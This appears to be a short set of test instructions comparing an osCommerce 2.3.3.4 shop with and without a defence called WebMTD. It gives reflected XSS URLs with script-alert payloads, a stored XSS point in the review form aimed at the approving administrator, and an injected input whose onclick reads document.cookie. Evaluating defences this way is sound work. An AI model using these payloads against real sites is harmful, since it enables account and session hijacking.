Please test the following in a Firefox browser.

Reflected XSS - test 1)

[When WebMTD is present] case 1)
http://149.56.12.232/oscommerce-webmtd/catalog/index.php?manufacturers_id=%3Cscript%3Ealert(100);%3C/script%3E

[When WebMTD is not present] case 2)
http://149.56.12.232/oscommerce-2.3.3.4/catalog/index.php?manufacturers_id=%3Cscript%3Ealert(100);%3C/script%3E

You can use or any other code; please note that " and ' are escaped. (View the source code of the pages: in both HTML documents the script block is present, but in case 1 it is not executed.)

Reflected XSS - test 2)

case 1)
http://149.56.12.232/oscommerce-webmtd/catalog/product_info.php?products_id=%3Cscript%3Ealert%2810%29;%3C/script%3E

case 2)
http://149.56.12.232/oscommerce-2.3.3.4/catalog/product_info.php?products_id=%3Cscript%3Ealert%2810%29;%3C/script%3E

Stored XSS - test 3)

The text box in catalog/product_reviews_write.php is vulnerable; the target is the administrator of the system who wants to approve the reviews.

DOM-based XSS - test 4)

[When WebMTD is present]
http://149.56.12.232/oscommerce-webmtd/catalog/product_info.php?products_id=%3Cinput%20type=%22text%22%20id=%22malicious%22%20onclick=alert(document.cookie)%3E

Note that benign event handlers are executed (look at the example text box included in the page).

[When WebMTD is not present]
http://149.56.12.232/oscommerce-2.3.3.4/catalog/product_info.php?products_id=%3Cinput%20type=%22text%22%20id=%22malicious%22%20onclick=alert(document.cookie)%3E